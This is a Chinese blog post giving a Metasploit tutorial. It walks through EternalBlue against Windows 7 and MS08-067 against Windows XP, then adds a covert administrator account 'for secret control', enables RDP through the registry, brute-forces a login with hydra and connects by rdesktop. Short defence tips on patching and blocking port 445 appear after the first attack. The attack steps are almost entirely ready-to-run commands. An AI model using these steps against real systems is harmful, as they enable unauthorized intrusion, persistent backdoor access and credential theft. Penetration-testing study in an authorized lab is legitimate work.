metasploit渗透测试

最新推荐文章于 2024-05-08 17:20:32 发布
最新推荐文章于 2024-05-08 17:20:32 发布
阅读量3.9k 收藏 11
点赞数 1
分类专栏: metasploit渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BigYellowHsw/article/details/78482027
版权

一些常用指令

msfconsole 打开控制台终端
msfupdate 更新
help [command] e.g. help search 命令使用帮助信息
search […] e.g. search portscan

use … 选择渗透攻击模块
show payloads 查看与该攻击模块相兼容的攻击载荷
set payload … 设置攻击载荷
set target 设置目标
show options 查看需要设置的配置参数
exploit 实施渗透攻击

metasploit渗透攻击模块在目录/usr/share/metasploit-framework/modules/exploits

nmap <扫描选项><扫描目标>

攻击实例

1、利用永恒之蓝(ms17_010)漏洞攻击win7

  1. 打开metasploit
    msfconsole
  2. 使用永恒之蓝模块
    search ms17-01
    use exploit/windows/smb/ms17_010_eternalblue
  3. 填充各种指令,主要是靶机IP,其中445端口已经默认了,其他不用改
    show options
    set RHOST 192.168.12.1
  4. 攻击
    exploit或者run
  5. 创建新用户,偷偷的控制使用
    net user admin 123456 /add
  6. 提权,将新创建的用户admin提到管理员权限
    net localgroup administrators admin /add
    查看权限:
    net user admin

防御办法:
1,网上下载补丁,
2,关闭445端口,dos命令:
netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block
netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445
检测445端口是否开启:
netstat -ano -p tcp | find “445”

2、利用Windows Server服务RPC请求缓冲区溢出漏洞(ms_08067)入侵WinXP

  1. 在msfconsole使用search命令搜索MS08067漏洞攻击程序
  2. 使用use命令调用MS08067漏洞攻击程序
    use exploit/windows/smb/ms08_067_netapi
  3. 使用show options 命令查看需要设置的选项
    可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)
    使用 set 命令设置 Module Options,此处需要设置目标IP
  4. 接着设置Exploit target,使用show targets 查看可选项
    可以看出哪些版本的系统存在此漏洞,攻击的XP系统为WinXP SP3 简体中文版,即使用set target 命令设置目标,此处即为set target 34
  5. 此时再用show options 可以看到全部设置完成,接着使用exploit 或者 run 进行攻击,执行exploit命令后得到一个meterpreter
  6. 在meterpreter中输入shell即可进入CMD窗口
  7. 可以进行一些攻击,如远程桌面控制:
    —-打开RDP服务
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    —-使用netstat -an命令查看端口是否开放
    —-接着使用net user命令查看XP系统中的用户
    net user
    —-然后针对指定用户比如sysorem用户进行登录密码爆破
    hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt
    —-使用hydra爆破密码得:12345接着就能直接登录XP进行远程控制
    rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389
    —-完成远程控制
BigYellowHsw
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
metasploit渗透测试入门
2301_77147676的博客
03-30 146
在中打开msfconsolemetasploit是一款kali自带的漏洞利用神器,在接下来的2个案例中,我们将利用的漏洞和的漏洞,进行渗透攻击演示,并获得目标主机的控制权,带你闯进渗透测试的神之领域。实验可以参考David Kennedy的《Metasploit:The Penetration Tester's Guide》,清华大学诸葛建伟老师翻译的《Metasploit渗透测试指南》​。
metasploitable3渗透测试
qq_57976347的博客
06-06 400
1、攻击windows服务器漏洞 用nmap对网段进行扫描nmap -sP 192.168. 在进行IP扫描 发现Windows服务器漏洞 步骤: msfconsole---进入渗透模块 search manageengine-------搜索渗透模块 search reverse_http---------搜索http渗透模块 use exploit/windows/http/manageeine_connectionid_write---...
白帽子学习——Metasploit渗透测试指南
weixin_43487532的博客
09-12 3735
黑客之渗透初学
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 7728
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
最新发布
XLbb的博客
05-08 1707
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSF: Metasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具。
msf完整渗透测试
clayzx的博客
11-15 6526
从生成shell到远程连接 前言: 本来是最近打算把时间都花在学c上,渗透目前跟着老师学以后研究,但为了后续上课需求,就必须把这个给拿下了,于是花了今天一天的时间都在研究这个,写一篇详细的实验结果,为了给自己做笔记,也为了刚学msfconsole提供一个资料参考。不说废话了,以下是我们这篇的目标: 1.生成shell 2.上shell 3.监听 4.拿到会话 5.提权 6.拿到密码 7.远程连接 首先此次实验需要准备一台kali的虚拟机和一台windows 7的
Linux-Metasploit 渗透-魔鬼教程
m0_74025111的博客
04-20 2871
这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞,换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。进行专业的渗透测试后,即使是系统未被攻破,也可以证明先前实行的防御是有效的,专业的渗透测试可以有效评估系统的安全状况,并提出合理的改进方案。用方法 -p 端口号) -sV 扫描服务器版本。
MetaSploit渗透测试魔鬼训练营》之环境搭建
热门推荐
关注网络安全、云原生安全
01-04 1万+
目录 渗透测试流程概述 顺序 渗透标准 渗透阶段 前期交互阶段 情报搜集阶段 威胁建模阶段 漏洞分析阶段 渗透攻击阶段 后渗透分析阶段 报告阶段 环境搭建 网络环境 虚拟机镜像 BT5 owasp bwa靶机 Win2K3 metasploitable Ubuntu Metasploitable WinxpSP3 metasploitable 情报搜集阶段 通过DNS和IP挖掘(踩点) whois域名注册信息查询 ip定位查询 Google Hackin...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
**Metasploit渗透测试指南** 渗透测试是一种授权的安全测试,旨在发现并评估计算机网络和系统的弱点,以增强安全防御。Metasploit是一款广泛使用的开源工具,专为安全专业人士设计,用于执行这种测试。本指南将深入...
Metasploit渗透测试指南(全) .pdf
12-23
Metasploit渗透测试指南》是一本全面介绍Metasploit框架的权威书籍,它涵盖了从基础知识到高级技术的广泛内容,旨在帮助读者理解和掌握渗透测试的精髓。Metasploit是一款强大的安全工具,广泛用于安全研究、漏洞...
Metasploit渗透测试魔鬼训练营》
cyynid的博客
01-17 744
7)利益性:利益永远是各种攻击的驱动力,Web攻击也不例外。近期相关司法部门公布有组织性的Web应用攻击,谋取利益的犯罪团伙案件越来越多,无论直接攻击Web 应用服务器,还是攻击欺骗客户终端的钓鱼攻击,抑或是通过可怕的分布式拒绝服务攻击(DDoS)进行敲诈,通过Web犯罪可以说是利润丰厚。6)变化性:Web应用的调整对于一个业务经常变化的公司来说,可以算是家常便饭,但是对于调整Web应用的开发人员、系统管理员等,他们往往缺乏充分的安全培训,却有着对复杂网络应用修改的特权,这样很难保证安全策略很好的实施。
看完这篇 教你玩转渗透测试靶机vulnhub——DC2
Aluxian_的博客
03-22 3890
Vulnhub靶机DC2渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址: ...
渗透测试学习之靶机DC-1
xdbzdgx的博客
11-05 2739
1.下载安装靶机 下载链接为DC: 1 ~ VulnHub,里面有三种下载方式任选一种即可,下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,依照指示重试即可成功,如果仍无法成功可百度、谷歌解决。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到root权限,找到flag。 注意,这里建议把DC-1靶机的网络链接模式改为NAT模式。 本文使用的攻击机为kali(安装在VMwa.
MSF(Metasploit)渗透测试---黑客工具使用指南
kuokay的博客
06-07 6278
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。 Metasploit 框架是可以添加漏洞代码片段,就好比一个军火库,
渗透测试-靶机打靶思路与方法
lza20001103的博客
08-18 4115
渗透测试-靶机打靶思路与方法 文章目录渗透测试-靶机打靶思路与方法一.对靶机进行信息收集1.首先对目标存活靶机发起嗅探:2.对目标主机开放端口及服务发起探测3.对非web端口的服务发起迅速的嗅探,尝试使用nday进行攻击4.开始进行web端口外部打点尝试二.一些靶机打点的工具和知识三.进行linux下的提权四.总结 一.对靶机进行信息收集 1.首先对目标存活靶机发起嗅探: ①sudo arp-scan -l 针对网卡发起扫描存活主机 ②arping扫描:for i in (seq 1 254);do arp
综合靶机渗透测试解析
w_j_x_123的博客
05-30 530
7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)6.在kali中搜索该提权漏洞,并将漏洞的披露时间当作flag值提交.(例:2023-05-26);1. 扫描目标靶机将靶机开放的所有端口,当作 flag 提交(例:21,22,23)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值